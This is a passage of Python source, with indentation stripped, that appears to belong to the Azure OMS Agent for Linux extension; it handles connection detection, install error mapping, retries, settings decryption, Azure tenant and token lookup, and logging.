# "Workspace(SCOM Workspace): scom" will be here
# If any other line is here, it may start sending data later
other_connection_exists = True
else:
for dir_name, sub_dirs, files in os.walk(EtcOMSAgentPath):
for sub_dir in sub_dirs:
sub_dir_name = os.path.basename(sub_dir)
workspace_search = re.compile(GUIDOnlyRegex, re.M)
if sub_dir_name == workspace_id:
hutil_log_info('The workspace to be enabled has already ' \
'been configured on the VM before; ' \
'continuing despite ' \
'stopOnMultipleConnections flag')
return
elif (workspace_search.match(sub_dir_name)
or sub_dir_name == 'scom'):
other_connection_exists = True
if other_connection_exists:
err_msg = ('This machine is already connected to some other Log ' \
'Analytics workspace, please set ' \
'stopOnMultipleConnections to false in public ' \
'settings or remove this property, so this machine ' \
'can connect to new workspaces, also it means this ' \
'machine will get billed multiple times for each ' \
'workspace it report to. ' \
'(LINUXOMSAGENTEXTENSION_ERROR_MULTIPLECONNECTIONS)')
# This exception will get caught by the main method
raise UnwantedMultipleConnectionsException(err_msg)
else:
detect_scom_connection()
def detect_scom_connection():
"""
If these two conditions are met, then we can assume the
VM is monitored
by SCOM:
1. SCOMPort is open and omiserver is listening on it
2. scx certificate is signed by SCOM server
To determine it check for existence of below two
conditions:
1. SCOMPort is open and omiserver is listening on it:
/etc/omi/conf/omiserver.conf can be parsed to
determine it.
2. scx certificate is signed by SCOM server: scom cert
is present @ /etc/opt/omi/ssl/omi-host-<hostname>.pem
(/etc/opt/microsoft/scx/ssl/scx.pem is a softlink to
this). If the VM is monitored by SCOM then issuer
field of the certificate will have a value like
CN=SCX-Certificate/title=<GUID>, DC=<SCOM server hostname>
(e.g CN=SCX-Certificate/title=SCX94a1f46d-2ced-4739-9b6a-1f06156ca4ac,
DC=NEB-OM-1502733)
Otherwise, if a scom configuration directory has been
created, we assume SCOM is in use
"""
scom_port_open = None # return when determine this is false
cert_signed_by_scom = False
if os.path.exists(OMSAdminPath):
scom_port_open = detect_scom_using_omsadmin()
if scom_port_open is False:
return
# If omsadmin.sh option is not available, use omiconfigeditor
if (scom_port_open is None and os.path.exists(OMIConfigEditorPath)
and os.path.exists(OMIServerConfPath)):
scom_port_open = detect_scom_using_omiconfigeditor()
if scom_port_open is False:
return
# If omiconfigeditor option is not available, directly parse omiserver.conf
if scom_port_open is None and os.path.exists(OMIServerConfPath):
scom_port_open = detect_scom_using_omiserver_conf()
if scom_port_open is False:
return
if scom_port_open is None:
hutil_log_info('SCOM port could not be determined to be open')
return
# Parse the certificate to determine if SCOM issued it
if os.path.exists(SCOMCertPath):
exit_if_openssl_unavailable('Install')
cert_cmd = 'openssl x509 -in {0} -noout -text'.format(SCOMCertPath)
cert_exit_code, cert_output = run_get_output(cert_cmd, chk_err = False,
log_cmd = False)
if cert_exit_code is 0:
issuer_re = re.compile(SCOMCertIssuerRegex, re.M)
if issuer_re.search(cert_output):
hutil_log_info('SCOM cert exists and is signed by SCOM server')
cert_signed_by_scom = True
else:
hutil_log_info('SCOM cert exists but is not signed by SCOM ' \
'server')
else:
hutil_log_error('Error reading SCOM cert; cert could not be ' \
'determined to be signed by SCOM server')
else:
hutil_log_info('SCOM cert does not exist')
if scom_port_open and cert_signed_by_scom:
err_msg = ('This machine may already be connected to a System ' \
'Center Operations Manager server. Please set ' \
'stopOnMultipleConnections to false in public settings ' \
'or remove this property to allow connection to the Log ' \
'Analytics workspace. ' \
'(LINUXOMSAGENTEXTENSION_ERROR_MULTIPLECONNECTIONS)')
raise UnwantedMultipleConnectionsException(err_msg)
def detect_scom_using_omsadmin():
"""
This method assumes that OMSAdminPath exists; if packages have not
been installed yet, this may not exist
Returns True if omsadmin.sh indicates that SCOM port is open
"""
omsadmin_cmd = '{0} -o'.format(OMSAdminPath)
exit_code, output = run_get_output(omsadmin_cmd, False, False)
# Guard against older omsadmin.sh versions
if ('illegal option' not in output.lower()
and 'unknown option' not in output.lower()):
if exit_code is 0:
hutil_log_info('According to {0}, SCOM port is ' \
'open'.format(omsadmin_cmd))
return True
elif exit_code is 1:
hutil_log_info('According to {0}, SCOM port is not ' \
'open'.format(omsadmin_cmd))
return False
def detect_scom_using_omiconfigeditor():
"""
This method assumes that the relevant files exist
Returns True if omiconfigeditor indicates that SCOM port is open
"""
omi_cmd = '{0} httpsport -q {1} < {2}'.format(OMIConfigEditorPath,
SCOMPort, OMIServerConfPath)
exit_code, output = run_get_output(omi_cmd, False, False)
# Guard against older omiconfigeditor versions
if ('illegal option' not in output.lower()
and 'unknown option' not in output.lower()):
if exit_code is 0:
hutil_log_info('According to {0}, SCOM port is ' \
'open'.format(omi_cmd))
return True
elif exit_code is 1:
hutil_log_info('According to {0}, SCOM port is not ' \
'open'.format(omi_cmd))
return False
def detect_scom_using_omiserver_conf():
"""
This method assumes that the relevant files exist
Returns True if omiserver.conf indicates that SCOM port is open
"""
with open(OMIServerConfPath, 'r') as omiserver_file:
omiserver_txt = omiserver_file.read()
httpsport_search = r'^[\s]*httpsport[\s]*=(.*)$'
httpsport_re = re.compile(httpsport_search, re.M)
httpsport_matches = httpsport_re.search(omiserver_txt)
if (httpsport_matches is not None and
httpsport_matches.group(1) is not None):
ports = httpsport_matches.group(1)
ports = ports.replace(',', ' ')
ports_list = ports.split(' ')
if str(SCOMPort) in ports_list:
hutil_log_info('SCOM port is listed in ' \
'{0}'.format(OMIServerConfPath))
return True
else:
hutil_log_info('SCOM port is not listed in ' \
'{0}'.format(OMIServerConfPath))
else:
hutil_log_info('SCOM port is not listed in ' \
'{0}'.format(OMIServerConfPath))
return False
def run_command_and_log(cmd, check_error = True, log_cmd = True):
"""
Run the provided shell command and log its output, including stdout and
stderr.
The output should not contain any PII, but the command might. In this case,
log_cmd should be set to False.
"""
exit_code, output = run_get_output(cmd, check_error, log_cmd)
if log_cmd:
hutil_log_info('Output of command "{0}": \n{1}'.format(cmd.rstrip(), output))
else:
hutil_log_info('Output: \n{0}'.format(output))
# also write output to STDERR since WA agent uploads that to Azlinux Kusto DB
# take only the last 100 characters as extension cuts off after that
try:
if exit_code is not 0:
sys.stderr.write(output[-500:])
# For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log
if exit_code is 17:
if "Failed dependencies:" in output:
# 52 is the exit code for missing dependency
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
output = "Installation failed due to missing dependencies. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
elif "waiting for transaction lock" in output or "dpkg: error processing package systemd" in output or "dpkg-deb" in output or "dpkg:" in output:
# 52 is the exit code for missing dependency
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
output = "There seems to be an issue in your package manager dpkg or rpm. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
elif "Errors were encountered while processing:" in output:
# 52 is the exit code for missing dependency
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
output = "There seems to be an issue while processing triggers in systemd. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
elif "Cannot allocate memory" in output:
# 52 is the exit code for missing dependency
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
output = "There seems to be insufficient memory for the installation. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
elif exit_code is 19:
if "rpmdb" in output or "cannot open Packages database" in output or "dpkg (subprocess): cannot set security execution context for maintainer script" in output or "error: dpkg status database is locked by another process" in output:
# OMI (19) happens to be the first package we install and if we get rpmdb failures, its a system issue
# 52 is the exit code for missing dependency i.e. rpmdb, libc6 or libpam-runtime
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
output = "There seems to be an issue in your package manager dpkg or rpm. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
elif "libc6 is not installed" in output or "libpam-runtime is not installed" in output or "exited with status 52" in output or "/bin/sh is needed" in output:
# OMI (19) happens to be the first package we install and if we get rpmdb failures, its a system issue
# 52 is the exit code for missing dependency i.e. rpmdb, libc6 or libpam-runtime
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
output = "Installation failed due to missing dependencies. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
elif exit_code is 33:
if "Permission denied" in output:
# Enable failures
# 52 is the exit code for missing dependency i.e. rpmdb, libc6 or libpam-runtime
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
output = "Installation failed due to insufficient permissions. Please ensure omsagent user is part of the sudoer file and has sufficient permissions to install. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
elif exit_code is 5:
if "Reason: InvalidWorkspaceKey" in output or "Reason: MissingHeader" in output:
# Enable failures
# 53 is the exit code for configuration errors
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 53
output = "Installation failed due to incorrect workspace key. Please check if the workspace key is correct. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
elif exit_code is 8:
if "Check the correctness of the workspace ID and shared key" in output:
# Enable failures
# 53 is the exit code for configuration errors
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 53
output = "Installation failed due to incorrect workspace key. Please check if the workspace key is correct. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
if exit_code is not 0 and exit_code is not 52:
if "dpkg:" in output or "dpkg :" in output or "rpmdb:" in output or "rpm.lock" in output:
# OMI (19) happens to be the first package we install and if we get rpmdb failures, its a system issue
# 52 is the exit code for missing dependency i.e. rpmdb, libc6 or libpam-runtime
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
output = "There seems to be an issue in your package manager dpkg or rpm. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
if "conflicts with file from package" in output or "Failed dependencies:" in output or "Please install curl" in output or "is needed by" in output or "check_version_installable" in output or "Error: curl was not installed" in output or "Please install the ctypes package" in output or "gpg is not installed" in output:
# OMI (19) happens to be the first package we install and if we get rpmdb failures, its a system issue
# 52 is the exit code for missing dependency i.e. rpmdb, libc6 or libpam-runtime
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
output = "Installation failed due to missing dependencies. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
if "Permission denied" in output:
# Enable failures
# 52 is the exit code for missing dependency i.e. rpmdb, libc6 or libpam-runtime
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
output = "Installation failed due to insufficient permissions. Please ensure omsagent user is part of the sudoer file and has sufficient permissions to install. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
except:
hutil_log_info('Failed to write output to STDERR')
return exit_code, output
def run_command_with_retries(cmd, retries, retry_check, final_check = None,
check_error = True, log_cmd = True,
initial_sleep_time = InitialRetrySleepSeconds,
sleep_increase_factor = 1):
"""
Caller provides a method, retry_check, to use to determine if a retry
should be performed. This must be a function with two parameters:
exit_code and output
The final_check can be provided as a method to perform a final check after
retries have been exhausted
Logic used: will retry up to retries times with initial_sleep_time in
between tries
If the retry_check returns True for retry_verbosely, we will try cmd with
the standard -v verbose flag added
"""
try_count = 0
sleep_time = initial_sleep_time
run_cmd = cmd
run_verbosely = False
while try_count <= retries:
if run_verbosely:
run_cmd = cmd + ' -v'
exit_code, output = run_command_and_log(run_cmd, check_error, log_cmd)
should_retry, retry_message, run_verbosely = retry_check(exit_code,
output)
if not should_retry:
break
try_count += 1
hutil_log_info(retry_message)
time.sleep(sleep_time)
sleep_time *= sleep_increase_factor
if final_check is not None:
exit_code = final_check(exit_code, output)
return exit_code
def run_command_with_retries_output(cmd, retries, retry_check, final_check = None,
check_error = True, log_cmd = True,
initial_sleep_time = InitialRetrySleepSeconds,
sleep_increase_factor = 1):
"""
Caller provides a method, retry_check, to use to determine if a retry
should be performed. This must be a function with two parameters:
exit_code and output
The final_check can be provided as a method to perform a final check after
retries have been exhausted
Logic used: will retry up to retries times with initial_sleep_time in
between tries
If the retry_check retuns True for retry_verbosely, we will try cmd with
the standard -v verbose flag added
"""
try_count = 0
sleep_time = initial_sleep_time
run_cmd = cmd
run_verbosely = False
while try_count <= retries:
if run_verbosely:
run_cmd = cmd + ' -v'
exit_code, output = run_command_and_log(run_cmd, check_error, log_cmd)
should_retry, retry_message, run_verbosely = retry_check(exit_code,
output)
if not should_retry:
break
try_count += 1
hutil_log_info(retry_message)
time.sleep(sleep_time)
sleep_time *= sleep_increase_factor
if final_check is not None:
exit_code = final_check(exit_code, output)
return exit_code, output
def is_dpkg_locked(exit_code, output):
"""
If dpkg is locked, the output will contain a message similar to 'dpkg
status database is locked by another process'
"""
if exit_code is not 0:
dpkg_locked_search = r'^.*dpkg.+lock.*$'
dpkg_locked_re = re.compile(dpkg_locked_search, re.M)
if dpkg_locked_re.search(output):
return True
return False
def was_curl_found(exit_code, output):
"""
Returns false if exit_code indicates that curl was not installed; this can
occur when package lists need to be updated, or when some archives are
out-of-date
"""
if exit_code is InstallErrorCurlNotInstalled:
return False
return True
def retry_skip(exit_code, output):
"""
skip retires
"""
return False, '', False
def retry_if_dpkg_locked_or_curl_is_not_found(exit_code, output):
"""
Some commands fail because the package manager is locked (apt-get/dpkg
only); this will allow retries on failing commands.
Sometimes curl's dependencies (i.e. libcurl) are not installed; if this
is the case on a VM with apt-get, 'apt-get -f install' should be run
Sometimes curl is not installed and is also not found in the package list;
if this is the case on a VM with apt-get, update the package list
"""
retry_verbosely = False
dpkg_locked = is_dpkg_locked(exit_code, output)
curl_found = was_curl_found(exit_code, output)
apt_get_exit_code, apt_get_output = run_get_output('which apt-get',
chk_err = False,
log_cmd = False)
if dpkg_locked:
return True, 'Retrying command because package manager is locked.', \
retry_verbosely
elif (not curl_found and apt_get_exit_code is 0 and
('apt-get -f install' in output
or 'Unmet dependencies' in output.lower())):
hutil_log_info('Installing all dependencies of curl:')
run_command_and_log('apt-get -f install')
return True, 'Retrying command because curl and its dependencies ' \
'needed to be installed', retry_verbosely
elif not curl_found and apt_get_exit_code is 0:
hutil_log_info('Updating package lists to make curl available')
run_command_and_log('apt-get update')
return True, 'Retrying command because package lists needed to be ' \
'updated', retry_verbosely
else:
return False, '', False
def final_check_if_dpkg_locked(exit_code, output):
"""
If dpkg is still locked after the retries, we want to return a specific
error code
"""
dpkg_locked = is_dpkg_locked(exit_code, output)
if dpkg_locked:
exit_code = DPKGLockedErrorCode
return exit_code
def retry_onboarding(exit_code, output):
"""
Retry under any of these conditions:
- If the onboarding request returns 403: this may indicate that the agent
GUID and certificate should be re-generated
- If the onboarding request returns a different non-200 code: the OMS
service may be temporarily unavailable
- If the onboarding curl command returns an unaccounted-for error code,
we should retry with verbose logging
"""
retry_verbosely = False
if exit_code is EnableErrorOMSReturned403:
return True, 'Retrying the onboarding command to attempt generating ' \
'a new agent ID and certificate.', retry_verbosely
elif exit_code is EnableErrorOMSReturnedNon200:
return True, 'Retrying; the OMS service may be temporarily ' \
'unavailable.', retry_verbosely
elif exit_code is EnableErrorOnboarding:
return True, 'Retrying with verbose logging.', True
return False, '', False
def raise_if_no_internet(exit_code, output):
"""
Raise the CannotConnectToOMSException exception if the onboarding
script returns the error code to indicate that the OMS service can't be
resolved
"""
if exit_code is EnableErrorResolvingHost:
raise CannotConnectToOMSException
return exit_code
def get_settings():
"""
Retrieve the configuration for this extension operation
"""
global SettingsDict
public_settings = None
protected_settings = None
if HUtilObject is not None:
public_settings = HUtilObject.get_public_settings()
protected_settings = HUtilObject.get_protected_settings()
elif SettingsDict is not None:
public_settings = SettingsDict['public_settings']
protected_settings = SettingsDict['protected_settings']
else:
SettingsDict = {}
handler_env = get_handler_env()
try:
config_dir = str(handler_env['handlerEnvironment']['configFolder'])
except:
config_dir = os.path.join(os.getcwd(), 'config')
seq_no = get_latest_seq_no()
settings_path = os.path.join(config_dir, '{0}.settings'.format(seq_no))
try:
with open(settings_path, 'r') as settings_file:
settings_txt = settings_file.read()
settings = json.loads(settings_txt)
h_settings = settings['runtimeSettings'][0]['handlerSettings']
public_settings = h_settings['publicSettings']
SettingsDict['public_settings'] = public_settings
except:
hutil_log_error('Unable to load handler settings from ' \
'{0}'.format(settings_path))
if ('protectedSettings' in h_settings
and 'protectedSettingsCertThumbprint' in h_settings
and h_settings['protectedSettings'] is not None
and h_settings['protectedSettingsCertThumbprint'] is not None):
encoded_settings = h_settings['protectedSettings']
settings_thumbprint = h_settings['protectedSettingsCertThumbprint']
encoded_cert_path = os.path.join('/var/lib/waagent',
'{0}.crt'.format(
settings_thumbprint))
encoded_key_path = os.path.join('/var/lib/waagent',
'{0}.prv'.format(
settings_thumbprint))
decoded_settings = base64.standard_b64decode(encoded_settings)
decrypt_cmd = 'openssl smime -inform DER -decrypt -recip {0} ' \
'-inkey {1}'.format(encoded_cert_path,
encoded_key_path)
try:
session = subprocess.Popen([decrypt_cmd], shell = True,
stdin = subprocess.PIPE,
stderr = subprocess.STDOUT,
stdout = subprocess.PIPE)
output = session.communicate(decoded_settings)
except OSError:
pass
protected_settings_str = output[0]
if protected_settings_str is None:
log_and_exit('Enable', 1, 'Failed decrypting ' \
'protectedSettings')
protected_settings = ''
try:
protected_settings = json.loads(protected_settings_str)
except:
hutil_log_error('JSON exception decoding protected settings')
SettingsDict['protected_settings'] = protected_settings
return public_settings, protected_settings
def update_status_file(operation, exit_code, exit_status, message):
"""
Mimic HandlerUtil method do_status_report in case hutil method is not
available
Write status to status file
"""
handler_env = get_handler_env()
try:
extension_version = str(handler_env['version'])
status_dir = str(handler_env['handlerEnvironment']['statusFolder'])
except:
extension_version = "1.0"
status_dir = os.path.join(os.getcwd(), 'status')
status_txt = [{
"version" : extension_version,
"timestampUTC" : time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
"status" : {
"name" : "Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux",
"operation" : operation,
"status" : exit_status,
"code" : exit_code,
"formattedMessage" : {
"lang" : "en-US",
"message" : message
}
}
}]
status_json = json.dumps(status_txt)
# Find the most recently changed config file and then use the
# corresponding status file
latest_seq_no = get_latest_seq_no()
status_path = os.path.join(status_dir, '{0}.status'.format(latest_seq_no))
status_tmp = '{0}.tmp'.format(status_path)
with open(status_tmp, 'w+') as tmp_file:
tmp_file.write(status_json)
os.rename(status_tmp, status_path)
def get_handler_env():
"""
Set and retrieve the contents of HandlerEnvironment.json as JSON
"""
global HandlerEnvironment
if HandlerEnvironment is None:
handler_env_path = os.path.join(os.getcwd(), 'HandlerEnvironment.json')
try:
with open(handler_env_path, 'r') as handler_env_file:
handler_env_txt = handler_env_file.read()
handler_env = json.loads(handler_env_txt)
if type(handler_env) == list:
handler_env = handler_env[0]
HandlerEnvironment = handler_env
except Exception as e:
waagent_log_error(str(e))
return HandlerEnvironment
def get_latest_seq_no():
"""
Determine the latest operation settings number to use
"""
global SettingsSequenceNumber
if SettingsSequenceNumber is None:
handler_env = get_handler_env()
try:
config_dir = str(handler_env['handlerEnvironment']['configFolder'])
except:
config_dir = os.path.join(os.getcwd(), 'config')
latest_seq_no = -1
cur_seq_no = -1
latest_time = None
try:
for dir_name, sub_dirs, file_names in os.walk(config_dir):
for file_name in file_names:
file_basename = os.path.basename(file_name)
match = re.match(r'[0-9]{1,10}\.settings', file_basename)
if match is None:
continue
cur_seq_no = int(file_basename.split('.')[0])
file_path = os.path.join(config_dir, file_name)
cur_time = os.path.getmtime(file_path)
if latest_time is None or cur_time > latest_time:
latest_time = cur_time
latest_seq_no = cur_seq_no
except:
pass
if latest_seq_no < 0:
latest_seq_no = 0
SettingsSequenceNumber = latest_seq_no
return SettingsSequenceNumber
def run_get_output(cmd, chk_err = False, log_cmd = True):
"""
Mimic waagent mothod RunGetOutput in case waagent is not available
Run shell command and return exit code and output
"""
if 'Utils.WAAgentUtil' in sys.modules:
# WALinuxAgent-2.0.14 allows only 2 parameters for RunGetOutput
# If checking the number of parameters fails, pass 2
try:
sig = inspect.signature(waagent.RunGetOutput)
params = sig.parameters
waagent_params = len(params)
except:
try:
spec = inspect.getargspec(waagent.RunGetOutput)
params = spec.args
waagent_params = len(params)
except:
waagent_params = 2
if waagent_params >= 3:
exit_code, output = waagent.RunGetOutput(cmd, chk_err, log_cmd)
else:
exit_code, output = waagent.RunGetOutput(cmd, chk_err)
else:
try:
output = subprocess.check_output(cmd, stderr = subprocess.STDOUT,
shell = True)
output = output.decode('latin-1')
exit_code = 0
except subprocess.CalledProcessError as e:
exit_code = e.returncode
output = e.output.decode('latin-1')
output = output.encode('utf-8', 'ignore')
# On python 3, encode returns a byte object, so we must decode back to a string
if sys.version_info >= (3,):
output = output.decode()
return exit_code, output.strip()
def get_tenant_id_from_metadata_api(vm_resource_id):
"""
Retrieve the Tenant ID using the Metadata API of the VM resource ID
Since we have not authenticated, the Metadata API will throw a 401, but
the headers of the 401 response will contain the tenant ID
"""
tenant_id = None
metadata_endpoint = get_metadata_api_endpoint(vm_resource_id)
metadata_request = urllib.request.Request(metadata_endpoint)
try:
# This request should fail with code 401
metadata_response = urllib.request.urlopen(metadata_request)
hutil_log_info('Request to Metadata API did not fail as expected; ' \
'attempting to use headers from response to ' \
'determine Tenant ID')
metadata_headers = metadata_response.headers
except urllib.error.HTTPError as e:
metadata_headers = e.headers
if metadata_headers is not None and 'WWW-Authenticate' in metadata_headers:
auth_header = metadata_headers['WWW-Authenticate']
auth_header_regex = r'authorization_uri=\"https:\/\/login\.windows\.net/(' + GUIDRegex + ')\"'
auth_header_search = re.compile(auth_header_regex)
auth_header_matches = auth_header_search.search(auth_header)
if not auth_header_matches:
raise MetadataAPIException('The WWW-Authenticate header in the ' \
'response does not contain expected ' \
'authorization_uri format')
else:
tenant_id = auth_header_matches.group(1)
else:
raise MetadataAPIException('Expected information from Metadata API ' \
'is not present')
return tenant_id
def get_metadata_api_endpoint(vm_resource_id):
"""
Extrapolate Metadata API endpoint from VM Resource ID
Example VM resource ID: /subscriptions/306ee7f1-3d0a-4605-9f39-ff253cc02708/resourceGroups/LinuxExtVMResourceGroup/providers/Microsoft.Compute/virtualMachines/lagalbraOCUb16C
Corresponding example endpoint: https://management.azure.com/subscriptions/306ee7f1-3d0a-4605-9f39-ff253cc02708/resourceGroups/LinuxExtVMResourceGroup?api-version=2016-09-01
"""
# Will match for ARM and Classic VMs, Availability Sets, VM Scale Sets
vm_resource_id_regex = r'^\/subscriptions\/(' + GUIDRegex + ')\/' \
'resourceGroups\/([^\/]+)\/providers\/Microsoft' \
'\.(?:Classic){0,1}Compute\/(?:virtualMachines|' \
'availabilitySets|virtualMachineScaleSets)' \
'\/[^\/]+$'
vm_resource_id_search = re.compile(vm_resource_id_regex, re.M)
vm_resource_id_matches = vm_resource_id_search.search(vm_resource_id)
if not vm_resource_id_matches:
raise InvalidParameterError('VM Resource ID is invalid')
else:
subscription_id = vm_resource_id_matches.group(1)
resource_group = vm_resource_id_matches.group(2)
metadata_url = 'https://management.azure.com/subscriptions/{0}' \
'/resourceGroups/{1}'.format(subscription_id,
resource_group)
metadata_data = urllib.parse.urlencode({'api-version' : '2016-09-01'})
metadata_endpoint = '{0}?{1}'.format(metadata_url, metadata_data)
return metadata_endpoint
def get_access_token(tenant_id, resource):
"""
Retrieve an OAuth token by sending an OAuth2 token exchange
request to the local URL that the ManagedIdentity extension is
listening to
"""
# Extract the endpoint that the ManagedIdentity extension is listening on
with open(ManagedIdentityExtListeningURLPath, 'r') as listening_file:
listening_settings_txt = listening_file.read()
try:
listening_settings = json.loads(listening_settings_txt)
listening_url = listening_settings['url']
except:
raise ManagedIdentityExtException('Could not extract listening URL ' \
'from settings file')
# Send an OAuth token exchange request
oauth_data = {'authority' : 'https://login.microsoftonline.com/' \
'{0}'.format(tenant_id),
'resource' : resource
}
oauth_request = urllib.request.Request(listening_url + '/oauth2/token',
urllib.parse.urlencode(oauth_data))
oauth_request.add_header('Metadata', 'true')
try:
oauth_response = urllib.request.urlopen(oauth_request)
oauth_response_txt = oauth_response.read()
except urllib.error.HTTPError as e:
hutil_log_error('Request to ManagedIdentity extension listening URL ' \
'failed with an HTTPError: {0}'.format(e))
hutil_log_info('Response from ManagedIdentity extension: ' \
'{0}'.format(e.read()))
raise ManagedIdentityExtException('Request to listening URL failed ' \
'with HTTPError {0}'.format(e))
except:
raise ManagedIdentityExtException('Unexpected error from request to ' \
'listening URL')
try:
oauth_response_json = json.loads(oauth_response_txt)
except:
raise ManagedIdentityExtException('Error parsing JSON from ' \
'listening URL response')
if (oauth_response_json is not None
and 'access_token' in oauth_response_json):
return oauth_response_json['access_token']
else:
raise ManagedIdentityExtException('Could not retrieve access token ' \
'in the listening URL response')
def get_workspace_info_from_oms(vm_resource_id, tenant_id, access_token):
"""
Send a request to the OMS service with the VM information to
determine the workspace the OMSAgent should onboard to
"""
oms_data = {'ResourceId' : vm_resource_id,
'TenantId' : tenant_id,
'JwtToken' : access_token
}
oms_request_json = json.dumps(oms_data)
oms_request = urllib.request.Request(OMSServiceValidationEndpoint)
oms_request.add_header('Content-Type', 'application/json')
retries = 5
initial_sleep_time = AutoManagedWorkspaceCreationSleepSeconds
sleep_increase_factor = 1
try_count = 0
sleep_time = initial_sleep_time
# Workspace may not be provisioned yet; sleep and retry if
# provisioning has been accepted
while try_count <= retries:
try:
oms_response = urllib.request.urlopen(oms_request, oms_request_json)
oms_response_txt = oms_response.read()
except urllib.error.HTTPError as e:
hutil_log_error('Request to OMS threw HTTPError: {0}'.format(e))
hutil_log_info('Response from OMS: {0}'.format(e.read()))
raise OMSServiceOneClickException('ValidateMachineIdentity ' \
'request returned an error ' \
'HTTP code: {0}'.format(e))
except:
raise OMSServiceOneClickException('Unexpected error from ' \
'ValidateMachineIdentity ' \
'request')
should_retry = retry_get_workspace_info_from_oms(oms_response)
if not should_retry:
# TESTED
break
elif try_count == retries:
# TESTED
hutil_log_error('Retries for ValidateMachineIdentity request ran ' \
'out: required workspace information cannot be ' \
'extracted')
raise OneClickException('Workspace provisioning did not complete ' \
'within the allotted time')
# TESTED
try_count += 1
time.sleep(sleep_time)
sleep_time *= sleep_increase_factor
if not oms_response_txt:
raise OMSServiceOneClickException('Body from ValidateMachineIdentity ' \
'response is empty; required ' \
'workspace information cannot be ' \
'extracted')
try:
oms_response_json = json.loads(oms_response_txt)
except:
raise OMSServiceOneClickException('Error parsing JSON from ' \
'ValidateMachineIdentity response')
if (oms_response_json is not None and 'WorkspaceId' in oms_response_json
and 'WorkspaceKey' in oms_response_json):
return oms_response_json
else:
hutil_log_error('Could not retrieve both workspace ID and key from ' \
'the OMS service response {0}; cannot determine ' \
'workspace ID and key'.format(oms_response_json))
raise OMSServiceOneClickException('Required workspace information ' \
'was not found in the ' \
'ValidateMachineIdentity response')
def retry_get_workspace_info_from_oms(oms_response):
"""
Return True to retry if the response from OMS for the
ValidateMachineIdentity request incidates that the request has
been accepted, but the managed workspace is still being
provisioned
"""
try:
oms_response_http_code = oms_response.getcode()
except:
hutil_log_error('Unable to get HTTP code from OMS repsonse')
return False
if (oms_response_http_code is 202 or oms_response_http_code is 204
or oms_response_http_code is 404):
hutil_log_info('Retrying ValidateMachineIdentity OMS request ' \
'because workspace is still being provisioned; HTTP ' \
'code from OMS is {0}'.format(oms_response_http_code))
return True
else:
hutil_log_info('Workspace is provisioned; HTTP code from OMS is ' \
'{0}'.format(oms_response_http_code))
return False
def init_waagent_logger():
"""
Initialize waagent logger
If waagent has not been imported, catch the exception
"""
try:
waagent.LoggerInit('/var/log/waagent.log', '/dev/stdout', True)
except Exception as e:
print('Unable to initialize waagent log because of exception ' \
'{0}'.format(e))
def waagent_log_info(message):
"""
Log informational message, being cautious of possibility that waagent may
not be imported
"""
if 'Utils.WAAgentUtil' in sys.modules:
waagent.Log(message)
else:
print('Info: {0}'.format(message))
def waagent_log_error(message):
"""
Log error message, being cautious of possibility that waagent may not be
imported
"""
if 'Utils.WAAgentUtil' in sys.modules:
waagent.Error(message)
else:
print('Error: {0}'.format(message))
def hutil_log_info(message):
"""
Log informational message, being cautious of possibility that hutil may
not be imported and configured
"""
if HUtilObject is not None:
HUtilObject.log(message)
else:
print('Info: {0}'.format(message))
def hutil_log_error(message):
"""
Log error message, being cautious of possibility that hutil may not be
imported and configured
"""
if HUtilObject is not None:
HUtilObject.error(message)
else:
print('Error: {0}'.format(message))
def log_and_exit(operation, exit_code = 1, message = ''):
"""
Log the exit message and perform the exit
"""
if exit_code is 0:
waagent_log_info(message)
hutil_log_info(message)
exit_status = 'success'
else:
waagent_log_error(message)
hutil_log_error(message)
exit_status = 'failed'
if HUtilObject is not None:
HUtilObject.do_exit(exit_code, operation, exit_status, str(exit_code),
message)
